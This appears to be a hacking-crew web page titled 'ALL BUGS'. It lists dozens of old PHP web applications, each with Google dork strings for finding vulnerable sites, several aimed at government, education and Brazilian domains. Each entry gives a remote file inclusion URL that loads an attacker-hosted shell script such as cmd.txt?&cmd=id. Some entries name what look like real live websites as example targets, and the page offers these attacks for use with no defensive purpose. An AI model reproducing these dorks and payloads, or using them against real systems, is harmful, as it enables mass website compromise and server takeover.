Home | Toturial | Download | All Bugs
_______________________________________________________________________________________________________
ALL BUGS
@Mambo
Key word: ( "Powered by Mambo" inurl:*gov* ) ou ( allinurl:*.br/index.php?option=com_content )
or ( allinurl:*gov*/component/option,com_contact/Itemid,*/ )
bug nya : index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=CMD
@PHPFanBase
#Key Word: ( "Powered by: PHPFanBase" inurl:*br* ) ou ( inurl:*.br/members.php?id=all )
or ( "Powered by: PHPCalendar" ) ou ( "Powered by: PHPCurrently" ) ou ( "Powered by: PHPClique" )
or ( "Powered by: PHPQuotes" )
#bug nya : protection.php?action=logout&siteurl=CMD
@AllMyGuests
#Key Word: ( Nuke ET Copyright © 2004 por Truzone. ) ou ( allinurl:*.edu.*/modules.php?name=allmyguests )
or ( "powered by AllMyGuests" inurl:*br* )
#bug nya : modules/ALlMyGuests/signin.php?_AMGconfig[cfg_serverpath]=CMD
#key word: ( "Site powered By Limbo CMS" )
#bug nya : index2.php?includes_dir=CMD
@SiteFrame
#key word: ( "powered by siteframe" ) ou ( allinurl:*gob*/folder.php?id=* )
#bug nya : classes.php?LOCAL_PATH=CMD
@Pivot
#Key word: ( "powered by pivot" ) ou ( allinurl:*br*/entry.php?id=*#* ) ou( allinurl:*de*/*.php?c=*w=*t=* )
or ( "powered by pivot" inurl:**/archive*.php ) ou ( "powered by pivot" inurl:**/entry.php?id=* )
#bug nya : extensions/moblog/moblog_lib.php?basedir=CMD
@PHPView
key word : /phpgedview/login.php
bug : help_text_vars.php?dir&PGV_BASE_DIRECTORY=
ex : http://[target]/[phpgetviewpath]/help_text_vars.php?dir&PGV_BASE_DIRECTORY=inject
@Cms
key word : /cms/front_content.php?idcat=
bug : contenido/classes/class.inuse.php?cfg[path][contenido]=
ex : http://[target]/[path]/contenido/classes/class.inuse.php?cfg[path][contenido]=inject
@PHPcoin
key word : /phpcoin/login.php
bug : config.php?_CCFG[_PKG_PATH_DBSE]=
ex : http://[target]/[path]/config.php?_CCFG[_PKG_PATH_DBSE]=inject CMD
@Popper
key word : /popper/index.php
bug : /popper/childwindow.inc.php?form=
ex : http://[target]/popper/childwindow.inc.php?form=http://[webinject]
@paBugs 2.0
keyword : "powered by paBugs 2.0 Beta 3"
bugsnya :class.mysql.php?path_to_bt_dir=
ex :http://waoarea.com/forum/Bugs/class.mysql.php?path_to_bt_dir=http://[webinject]
@AllMyLinks
Keyword : "powered by AllMyLinks"
bug : /include/footer.inc.php?_AMLconfig[cfg_serverpath]=
ex:http://www.edu.ch/links/include/footer.inc.php?_AMLconfig[cfg_serverpath]=http:[attacker]
@Cubecart 3.0.6
keyword : "powered by CubeCart 3.0.6"
bug : /includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=
ex: http://[target]/[path]/includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://[attacker]
@Ashnews
KeyWord: allinurl:"powered by AshNews"
bug:ashnews.php?pathtoashnews=
example:
http:/http://roswell.hitnews.pl/ashnews.php?pathtoashnews=http://[attacker]
@HostAdmin
KeyWord: :"Powered by HostAdmin"
bug : /directory/index.php?path=[suntik.txt]
@phpBB 2.0.6
KeyWord : allinurl:Powered by phpBB 2.0.6
inject dengan:&highlight=%2527.include($_GET[a]),exit.%2527&a=
ex:http://student.ipb.ac.id/forum/viewtopic.php?p=3&highlight=%2527.include($_GET[a]),exit.%2527&a=http://[suntikan maut]
@Fantastic News
key word : "powered by Fantastic News v2.1.2"
bug : archive.php?CONFIG[script_path]=CMD
ex : http://[target]/[path]/archive.php?CONFIG[script_path]=http://[evilweb]
@ImpexData
bug:impex/ImpExData.php?systempath=
contohnya : http://www.windows-mobile.ch/vb/impex/ImpExData.php?systempath=http://[attack]/cmd.txt?&cmd
@Iuser
KeyWord: "Powered By Iuser"
Bug : /iuser/common.php?include_path=
http://www.humanenergyscience.com/iuser/common.php?include_path=http://[attack]/bom.txt?
@Knowledge Base
KeYWord : Knowledge Base at PHPBB
bug : /includes/kb_constants.php?module_root_path=
contoh : http://www.vitrax.org/includes/kb_constants.php?module_root_path=http://injectbos/cmd.txt?
@MyEvent 1.2
KeyWord : "MyEvent 1.2 " or "/calendar/myevent.php"
Bug : /myevent.php?myevent_path=
ex: http://www.zoetermeer9.nl/site/calendar/myevent.php?myevent_path=injekan.cmd
@Advanced Guestbook
Keyword : inurl:guestbook.php "Advanced GuestBook" "powered by phpbb"
Bug : /admin/addentry.php?phpbb_root_path=
ex:http://radiogodhavn.dk/forum/admin/addentry.php?phpbb_root_path=injekan
@Limbo CMS
Keyword : inurl:"index2.php?option=rss" atau "powered By Limbo CMS"
Exploit: /classes/adodbt/sql.php?classes_dir=http://[scriptshellmu]?
Contoh : http://www.hoshemin.com.ru/classes/adodbt/sql.php?classes_dir=injekan
@TopSite
Keyword : "Powered By Aardvark Topsites PHP 4.2.2"
injek:www.target.com/[path]/sources/lostpw.php?FORM[set]=1&FORM[session_id]=1&CONFIG[path]=[evil code]
@Albinator
KeyWord : "Powered by Albinator"
bug : albinator/essential/gc.php?dirpath=http://geocities.com/wong_sedenk/injek.txt?
@TotalCalendar
KeyWord : "Powered by TotalCalendar"
Bug : www.target.com/[path]/sources/lostpw.php?FORM[set]=1&FORM[session_id]=1&CONFIG[path]=injekan
@CuteNews
KeyWord : inurl:cutenews/shownews.php
Bug : /cutenews/shownews.php?cutepath=
ex : http://www.flip-script.com/cutenews/shownews.php?cutepath=injekan.com?
@Coopermine
Keyword : allinurl:/ modules / coppermine
Bug : http://[VICTIM]/modules/coppermine/themes/default/theme.php?THEME_DIR=http://www.inject.com
@MaMbo 4.5
KeyWord : inurl:includes/Cache/Lite/ or "powered by mambo 4.5"
Bug : http://[victim]/includes/Cache/Lite/Function.php?mosConfig_absolute_path=http ://situsinject.com
ex: http://www.jasonruyle.com/en/includes/Cache/Lite/Function.php?mosConfig_absolute_path=injekan.com?
@CgiUpgrade
KeyWord : allinurl:/index.cgiupgrade_album.php
Bug : http://[VICTIM]/index.cgiupgrade_album.php?GALLERY_BASEDIR=http://www.webloe.com/phpinjection.txt?&cmd=id
@XoopsGallery
KeyWord : allinurl:/modules/xoopsgallery
Bug : http://[VICTIM]/modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.webloe.com/phpinjection.txt?&cmd=id
@SkinZero
KeyWord : allinurl:/skin/zero_vote/error.php or allinurl:/zero_vote/error.php
Bug : /skin/zero_vote/error.php?dir=http://[ATTACKER]
@pnphBB2
KeyWord : allinurl:4nAlbum site:.org
allinurl:PNphpBB2 site:.org
Bug : /modules/4nAlbum/public/displayCategory.php?basepath= web injek
/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=web injek
@FarsiNews
keyword "powered by farsiNews"
Bug : http://[target]/loginout.php?cmd=dir&cutepath=injekan
@MaMbo 4.5.1
KeyWord : allinur:index2.php?option=
inurl:mambo/index.php
inurl:cms/index.php
powered by mambo 4.5.1
Bug : www.target.com/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=
1&GLOBALS=&mosConfig_absolute_path=inject
@Agenda
KeyWord : intitle:phpmyagenda
Bug : agenda.php3?rootagenda=http://injek.org/injek.txt?
@Fclick
KeyWord : inurl:"fclick.php?fid"
Bugs : /show.php?path=Inject
@Squirrelcart
KeyWord : inurl:/squirrelcart/
bug : /cart_content.php?cart_isp_root=http://bdubphotos.net/gallery/data/info/info.txt?
@ezUserManager
KeyWord : "powered by ezUserManager"
Bug : http://[target]/[path]/ezusermanager_pwd_forgott.php?ezUserManager_Path=http://[evilscript]
@DeluxeBB
KeyWord : "Powered by: DeluxeBB "
Bug: http://[target]/[path]/files/test.php.php-1147772503.ext?cmd=injek
@TrNewsPortal
KeyWord : "TR Newsportal" or allinurl: thread.php?group
Bug : http://www.site.com/[Newsportal_path]/extras/poll/poll.php?file_newsportal=injek
@EQdkp
KeyWord: "powered by EQdkp"
bug : /includes/dbal.php?eqdkp_root_path=
ex : http://[target]/[path]/includes/dbal.php?eqdkp_root_path=injek
@UBBthread
KeyWord: allinurl:"/ubbthreads/"
Bug: /addpost_newpoll.php?addpoll=preview&thispath=http://[attacker]/cmd.gif?&cmd=id
@DragonPath
Keyword: "powered by Php Blue Dragon Platinum"
http://www.site.com/[dragon_path]/public_includes/pub_popup/popup_finduser.php?vsDragonRootPath=[evil_scripts
@ScozNews
KeyWord: "(Powered By ScozNews)"
http://www.site.com/[news_path]/sources/functions.php?CONFIG[main_path]=[evil_scripts]
http://www.site.com/[news_path]/sources/template.php?CONFIG[main_path]=[evil_scripts]
http://www.site.com/[news_path]/sources/news.php?CONFIG[main_path]=[evil_scripts]
http://www.site.com/[news_path]/sources/help.php?CONFIG[main_path]=[evil_scripts]
http://www.site.com/[news_path]/sources/mail.php?CONFIG[main_path]=[evil_scripts]
http://www.site.com/[news_path]/sources/Admin/admin_cats.php?CONFIG[main_path]=[evil_scripts]
http://www.site.com/[news_path]/sources/Admin/admin_edit.php?CONFIG[main_path]=[evil_scripts]
http://www.site.com/[news_path]/sources/Admin/admin_import.php?CONFIG[main_path]=[evil_scripts]
http://www.site.com/[news_path]/sources/Admin/admin_templates.php?CONFIG[main_path]=[evil_scripts]
@Informium
KeyWord: "Informium 0.12.0"
bugs: http://www.site.com/[Informium_path]/admin/common-menu.php?CONF[local_path]=[evil_scripts]
@Igloo
Keyword: "Igloo 0.1.9" allinurl: igloo
bugs: http://www.site.com/[Igloo_path]/class/Wiki/Wiki.php?c_node[class_path]=[evil_scripts]
@Phpondirectory
KeyWord: phpOnDirectory (CONST_INCLUDE_ROOT) <= v.1.0 Remote File Include Vulnerability
http://www.site.com/[phpOnDirectory_path]/admin/generate_category_html.php?CONST_INCLUDE_ROOT=[evil_scripts]
http://www.site.com/[phpOnDirectory_path]/admin/generate_site_html.php?CONST_INCLUDE_ROOT=[evil_scripts]
http://www.site.com/[phpOnDirectory_path]/admin/index.php?CONST_INCLUDE_ROOT=[evil_scripts]
@aePartner
KeyWord: aePartner (dir[data]) <= v.0.8.3 Remote File Include Vulnerability
Bugs: http://www.site.com/[aePartner_path]/inc/design.inc.php?dir[data]=[evil_scripts]
@DreamAccount
Keyword: "powered by DreamAccount"
Bugs:
/auth.cookie.inc.php?da_path=http://www.yourspace.com/yourscript.php?
/auth.header.inc.php?da_path=http://www.yourspace.com/yourscript.php?
/auth.sessions.inc.php?da_path=http://www.yourspace.com/yourscript.php?
@Wikiwig
KeyWord: Wikiwig <= V4.1 Remote File Include Vulnerability
Bugs: http://www.site.com/[wikiwig-V4.1]/_wk/wk_lang.php?WK[wkPath]=[evil_scripts]
@DittoNews
KeyWord: "News Managed by Ditto News"
Bugs: http://www.site.com/[XtremeNews_path]/sources/post.php?fil_config=[evil_scripts]
______________________________________________________________________________________________________
#GaulDong | #crusader
By : MG-Manado or bogani|totabuan
